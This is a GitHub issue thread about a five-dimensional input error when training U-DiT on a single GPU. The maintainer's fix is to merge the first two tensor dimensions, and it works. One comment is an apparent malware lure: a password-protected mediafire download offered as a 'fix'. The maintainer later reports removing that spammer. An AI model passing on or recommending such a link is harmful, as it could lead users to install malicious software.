### ISSUE TITLE
Dimension inconsistencies occur during training

### ISSUE THREAD

**Issue by water221** [YuchuanTian/U-DiT#11]
I used the following command for training `python train.py --feature-path="./data/imagenet_feature" --image-size=256 --model="U-DiT-S" --epochs=1400 --global-batch-size=8`, my local environment is a single 4060 Ti GPU graphics card, python=3.10, CUDA=11.8, the following error occurs after running:
The data I use is imagenet_feature. I guess there is one missing step of dimensional transformation in the data processing process, but I have not found out where to transform. If possible, can you help me investigate the problem and provide a suitable solution? Thank you very much for your help
```[2024-08-27 10:39:06] Training for 1400 epochs...
[2024-08-27 10:39:06] Beginning epoch 0...
Traceback (most recent call last):
  File "E:\paper-code\U-DiT\train.py", line 343, in <module>
    main(args, unparsed)
  File "E:\paper-code\U-DiT\train.py", line 273, in main
    loss_dict = diffusion.training_losses(model, x, t, model_kwargs)
  File "E:\paper-code\U-DiT\diffusion\respace.py", line 97, in training_losses
    return super().training_losses(self._wrap_model(model), *args, **kwargs)
  File "E:\paper-code\U-DiT\diffusion\gaussian_diffusion.py", line 747, in training_losses
    model_output = model(x_t, t, **model_kwargs)
  File "E:\paper-code\U-DiT\diffusion\respace.py", line 129, in __call__
    return self.model(x, new_ts, **kwargs)
  File "D:\ProgramData\anaconda3\envs\UDiT\lib\site-packages\torch\nn\modules\module.py", line 1518, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "D:\ProgramData\anaconda3\envs\UDiT\lib\site-packages\torch\nn\modules\module.py", line 1527, in _call_impl
    return forward_call(*args, **kwargs)
  File "D:\ProgramData\anaconda3\envs\UDiT\lib\site-packages\torch\nn\parallel\distributed.py", line 1519, in forward
    else self._run_ddp_forward(*inputs, **kwargs)
  File "D:\ProgramData\anaconda3\envs\UDiT\lib\site-packages\torch\nn\parallel\distributed.py", line 1355, in _run_ddp_forward
    return self.module(*inputs, **kwargs)  # type: ignore[index]
  File "D:\ProgramData\anaconda3\envs\UDiT\lib\site-packages\torch\nn\modules\module.py", line 1518, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "D:\ProgramData\anaconda3\envs\UDiT\lib\site-packages\torch\nn\modules\module.py", line 1527, in _call_impl
    return forward_call(*args, **kwargs)
  File "E:\paper-code\U-DiT\udit_models.py", line 697, in forward
    x = self.x_embedder(x)                   # (N, C, H, W)
  File "D:\ProgramData\anaconda3\envs\UDiT\lib\site-packages\torch\nn\modules\module.py", line 1518, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "D:\ProgramData\anaconda3\envs\UDiT\lib\site-packages\torch\nn\modules\module.py", line 1527, in _call_impl
    return forward_call(*args, **kwargs)
  File "E:\paper-code\U-DiT\udit_models.py", line 548, in forward
    x = self.proj(x)
  File "D:\ProgramData\anaconda3\envs\UDiT\lib\site-packages\torch\nn\modules\module.py", line 1518, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "D:\ProgramData\anaconda3\envs\UDiT\lib\site-packages\torch\nn\modules\module.py", line 1527, in _call_impl
    return forward_call(*args, **kwargs)
  File "D:\ProgramData\anaconda3\envs\UDiT\lib\site-packages\torch\nn\modules\conv.py", line 460, in forward
    return self._conv_forward(input, self.weight, self.bias)
  File "D:\ProgramData\anaconda3\envs\UDiT\lib\site-packages\torch\nn\modules\conv.py", line 456, in _conv_forward
    return F.conv2d(input, weight, bias, self.stride,
RuntimeError: Expected 3D (unbatched) or 4D (batched) input to conv2d, but got input of size: [8, 32, 4, 32, 32]```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by YuchuanTian** [comment]
Okay, I have removed the spammer. Thanks!
It seems that the input size is five-dimensional (which I think is strange...) What about squeezing the first two dimension ([8, 32, 4, 32, 32] -> [256, 4, 32, 32]) in ```forward``` of U-DiT? Then everything will work properly.

**Comment by water221** [comment]
I also find it very strange, mainly because I am still a little vague about the meaning of each dimension displayed in the error ([8,32,4,32,32]).I am going to step through debug in the hope of finding the problem, and I will also try the solution you proposed. Thank you very much for your patience in answering

**Comment by YuchuanTian** [comment]
I guess I got to know the reason:
The vae features are prepared for 8 parallel processes (8 card training) by default. But in this case, only 1 process is inited and thus an extra first dimention (8) occurs.
The last three dimension stands for: [VAE_feat_channel, h, w]; the second dimension is the batch dimension in each npy file.

**Comment by water221** [comment]
Thanks for the answer, and if you can, can you teach me how to change the number of processes to make sure it can be trained on a single card

**Comment by YuchuanTian** [comment]
I think simply squeezing the first two dimension of the input is fine.

**Comment by water221** [comment]
Thank you very much for your answer. I squeezed the first two dimensions together. The project has successfully started running, but there has been no change here at the moment, and there is no progress display. Is this normal? I am waiting for it to proceed to the next log output.
![image](https://github.com/user-attachments/assets/96a13975-489f-4e3f-b181-f4bfc7f754c0)

**Comment by water221** [comment]
I just need to wait for a while, and the model has started training normally, thank you for your patient answer

**Comment by YuchuanTian** [comment]
Glad to know that! I think the reason is that preparation (of the data; of the model) is in process.

**Comment by cydfight-commits** [comment]
I used the following command for training. My local environment has a 3090 GPU, python=3.9, CUDA=11.8, and the data I used is imagenet_feature. The training command is:

accelerate launch --mixed_precision fp16 train_feature.py --feature-path=/hy-tmp/U-DiT/imagenet_feature --model=U-DiT-S --global-batch-size=2 --results-dir /hy-tmp/U-DiT/results-imagenet_feature

However, after running it, I got an error:
RuntimeError: Expected 3D (unbatched) or 4D (batched) input to conv2d, but got input of size: [2, 32, 4, 32, 32]

According to your previous answer, I tried merging the first two dimensions, and the code ran successfully. My question now is, what is the significance of merging these two dimensions? Does this mean the batch size of images processed at one time is 2*32, which equals 64?

Because the first dimension [2, 32, 4, 32, 32] always changes according to the global-batch-size set in the code.

Could you help answer my question? Thank you very much for your help.
